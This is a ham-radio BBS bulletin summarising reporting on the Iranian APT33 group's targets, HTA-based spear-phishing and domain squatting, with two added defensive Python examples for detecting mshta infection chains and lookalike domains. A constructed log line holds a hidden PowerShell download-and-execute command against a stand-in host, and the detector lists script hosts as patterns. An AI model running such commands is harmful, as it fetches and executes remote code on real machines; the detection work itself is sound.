HB1PMS > TECH 18.02.20 07:30l 93 Lines 4635 Bytes #999 (0) @ WW
BID : 2096HB1PMS
Read: DAE595 GAST
Subj: Dissecting Modus Operandi And Activities Of Infamo
Path: DBO595<DBX320<FRB024<NL3TD<NL3PRC<GY1BBS<HB1BBS
Sent: 200217/1916Z 8395@HB1BBS.ZL.NLD.EU BPQ6.0.19
Van: HB1PMS@HB1BBS.ZL.NLD.EU
Dissecting Modus Operandi And Activities Of Infamous Iranian Hacker Group
APT33
February 16, 2020 | Threat Actors
The Holmium threat actor group has been active since at least 2013.
They have targeted firms in the US, Saudi Arabia, and South Korea.
In a recent report, Microsoft revealed that APT33, also tracked as Holmium
and Magnallium, stole data from about 200 companies over the past two years.
The Iranian group broke into corporate and government systems and caused
hundreds of millions of dollars in damage. Holmium has been active since at
least 2013.
Primary targets: Holmium has targeted organizations across multiple sectors,
concentrating on firms in the US, Saudi Arabia, and South Korea. Lately the
group has shifted its focus to aviation firms with both military and
commercial business, and to organizations tied to petrochemical production.
Modus operandi: APT33 relies primarily on spear-phishing emails. The emails
carry URLs pointing at specific file types, notably HTML Application (.hta)
files. When the recipient opens the link, the HTA's embedded script is
executed by mshta.exe and downloads the malware, starting the infection
chain.
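Added example (not from the article, Microsoft or FireEye): detection logic
for the link-to-HTA chain described above, run over constructed web-proxy
and process-creation log lines. The key=value log layout, the field names,
the hosts, users and URLs are all assumed; a real deployment would map the
same three rules onto the proxy and EDR schema actually in use.

```python
"""Flag an HTA-based phishing chain in constructed proxy and process logs.

Added example; the log layout, field names, hosts and users are assumed.
The chain described in the article (link -> .hta -> malware download) is
visible in two places: the web proxy sees a request for a remote .hta, and
endpoint process telemetry sees mshta.exe started with a remote URL and
then spawning a script host that fetches the next stage.
"""
import re
from urllib.parse import urlparse

# Constructed sample lines in a key=value layout; nothing here is real.
PROXY_LOG = r"""
2020-02-16T09:12:01Z user=j.doe src=10.1.4.22 method=GET url=http://cdn.example-invoice.test/offer/job_description.hta status=200
2020-02-16T09:12:03Z user=j.doe src=10.1.4.22 method=GET url=https://intranet.corp.test/portal/index.html status=200
2020-02-16T09:13:10Z user=a.lee src=10.1.4.31 method=GET url=http://203.0.113.9/a.hta?id=7 status=200
2020-02-16T09:14:00Z user=a.lee src=10.1.4.31 method=GET url=https://www.example.test/docs/report.pdf status=200
"""

PROCESS_LOG = r"""
2020-02-16T09:12:02Z host=WS-0422 user=j.doe parent="C:\Program Files\Mozilla Firefox\firefox.exe" image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe http://cdn.example-invoice.test/offer/job_description.hta"
2020-02-16T09:12:05Z host=WS-0422 user=j.doe parent="C:\Windows\System32\mshta.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://cdn.example-invoice.test/s')"
2020-02-16T09:30:00Z host=WS-0431 user=a.lee parent="C:\Windows\explorer.exe" image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe C:\Users\a.lee\Documents\local_tool.hta"
2020-02-16T09:31:00Z host=WS-0431 user=a.lee parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmdline="notepad.exe"
"""

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
REMOTE_RE = re.compile(r"https?://", re.I)
# Interpreters an HTA commonly hands off to for the second stage.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def parse_line(line):
    """Split a log line into its leading timestamp and a dict of key=value fields."""
    ts, _, rest = line.partition(" ")
    fields = {k: q or b for k, q, b in KV_RE.findall(rest)}
    return ts, fields


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_proxy(fields):
    """Rule 1: a request whose URL path ends in .hta (the query string is ignored)."""
    url = fields.get("url", "")
    if urlparse(url).path.lower().endswith(".hta"):
        return "proxy_hta_download", url
    return None


def check_process(fields):
    """Rule 2: mshta.exe given a remote URL. Rule 3: mshta.exe spawning a script host."""
    image = basename(fields.get("image", ""))
    parent = basename(fields.get("parent", ""))
    cmdline = fields.get("cmdline", "")
    if image == "mshta.exe" and REMOTE_RE.search(cmdline):
        return "mshta_remote_url", cmdline
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        return "mshta_spawned_script_host", f"{image}: {cmdline}"
    return None


def scan(log_text, check):
    """Run one rule set over every non-empty line; return (rule, ts, user, detail) hits."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, fields = parse_line(line)
        hit = check(fields)
        if hit:
            hits.append((hit[0], ts, fields.get("user"), hit[1]))
    return hits


def run():
    """Apply both rule sets. The local .hta on line 3 of PROCESS_LOG is deliberately not flagged."""
    return scan(PROXY_LOG, check_proxy) + scan(PROCESS_LOG, check_process)


if __name__ == "__main__":
    for rule, ts, user, detail in run():
        print(f"{ts} {user:<6} {rule:<26} {detail}")
```

Rule 2 keys on a remote URL rather than on mshta.exe itself because HTAs are
also used legitimately from local paths; rule 3 catches the hand-off to
PowerShell that the download step usually needs, which survives even when the
first-stage URL changes.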
The group also uses a range of malware across its campaigns, including
SHAPESHIFT, DROPSHOT, TURNEDUP, NANOCORE, NETWIRE, and ALFA Shell, and
leverages popular Iranian hacker tools and DNS servers in its attack
campaigns.
Examples:
- From mid-2016 to early 2017, Magnallium compromised a US firm in the
aerospace sector and targeted a business group located in Saudi Arabia.
- In the same period it also targeted a South Korean company doing business
in oil refining and petrochemicals.
- In May 2017, it targeted a Saudi organization and a South Korean business
with a fake job-offer phishing campaign, luring victims with vacancies at a
Saudi Arabian petrochemical company.
- In one incident, APT33 used domain squatting against organizations in
Saudi Arabia. It registered multiple domains masquerading as Saudi Arabian
aviation companies and the Western organizations that provide training,
maintenance and support for Saudi Arabia's military and commercial fleets.
According to FireEye, the domains impersonated Boeing, Alsalam Aircraft
Company, Northrop Grumman Aviation Arabia (NGAAKSA), and Vinnell Arabia.
- The group was also blamed for last year's attacks involving the Shamoon
data-wiper malware, which was used against industrial players in the Middle
East and Europe.
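Added example (not from the article or from FireEye): a small lookalike-domain
check of the kind a defender runs over a newly-registered-domain feed to
catch squatting like that described above. The brand tokens are taken from
the organizations the article names; the candidate feed, the allowlist, the
confusable table and the .test TLD are constructed.

```python
"""Flag lookalike domains for a set of protected brand names.

Added example; the candidate feed, the allowlist and the .test TLD are
constructed. Brand tokens are the organizations the article says were
impersonated. Four signals are checked per DNS label: the brand used as a
label of a domain the brand does not own, a confusable-character variant
(b0eing), a label that embeds the brand (boeing-careers), and a label
within edit distance 1 of the brand (vinnel).
"""

BRANDS = {"boeing", "alsalam", "northropgrumman", "vinnell"}
# Domains the brands legitimately own (constructed); exact matches are skipped.
ALLOWLIST = {"boeing.test", "alsalam.test", "vinnellarabia.test"}
# Constructed feed of newly observed domains.
CANDIDATES = [
    "boeing.test",
    "boeing-careers.test",
    "b0eing.test",
    "vinnel.test",
    "alsalam.jobs-portal.test",
    "nortropgrumman.test",
    "news.aviation-daily.test",
]
# Character substitutions attackers use because they look alike in many fonts.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(label):
    """Replace confusable sequences so 'b0eing' compares equal to 'boeing'."""
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute) by dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain, brands=BRANDS, allowlist=ALLOWLIST):
    """Return (reason, brand) for a suspicious domain, or None.

    The TLD is assumed to be the last label only; a real deployment would use
    the Public Suffix List so that e.g. co.uk is not treated as a brand label.
    """
    domain = domain.lower().rstrip(".")
    if domain in allowlist:
        return None
    labels = domain.split(".")[:-1]
    for label in labels:
        plain = label.replace("-", "")
        for brand in sorted(brands):
            if plain == brand:
                return "brand_label", brand
            if normalize(plain) == brand:
                return "confusable", brand
            if brand in plain:
                return "embeds", brand
            # Edit distance 1 is too noisy for short tokens, so require six characters.
            if len(brand) >= 6 and levenshtein(plain, brand) <= 1:
                return "edit_distance", brand
    return None


def scan_feed(candidates=CANDIDATES):
    """Classify every candidate and keep the hits as (domain, reason, brand)."""
    hits = []
    for domain in candidates:
        verdict = classify(domain)
        if verdict:
            hits.append((domain, *verdict))
    return hits


if __name__ == "__main__":
    for domain, reason, brand in scan_feed():
        print(f"{domain:<28} {reason:<14} -> {brand}")
```

The checks are ordered from strongest to weakest signal so that a domain is
reported once with the most specific reason; the edit-distance rule is the
noisiest and is the one to tune against the organization's own false-positive
rate.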
Conclusion: Given the malware and attack techniques in use, experts believe
the group is gradually expanding its operations to other countries.
"Its aggressive use of the tools, combined with shifting geopolitics,
underscores the danger that APT33 poses to governments and commercial
interests in the Middle East and throughout the world. Identifying this
group and its destructive capability presents an opportunity for
organizations to detect and deal with related threats proactively," FireEye
explained.
73 Henk.
======================================================================
_ _ ____ __ ____ ____ _____
| | | | _ \/_ | _ \| _ \ / ____| SYS: Henk (hb1nos@hb1bbs.com)
| |__| | |_) || | |_) | |_) | (___ QTH: Ouwerkerk - JO11XO
| __ | _ < | | _ <| _ < \___ \ BBS: HB1BBS.ZLD.NLD.EU
| | | | |_) || | |_) | |_) |____) | QRV: 27.235 MHz (FM 1200bps)
|_| |_|____/ |_|____/|____/|_____/ WEB: www.hb1bbs.com
======================================================================
** Host of BPQ Netrom/Node NLDHUB::NL9HUB 85.214.163.10 UDP 93
======================================================================
** This message is generated with Sally 7.2.033
----------------------------------------------------------------------
** Timed Monday 17 February 2020 20:14 West Europe (standard time)
** BBS HB1PMS@HB1BBS.ZL.NLD.EU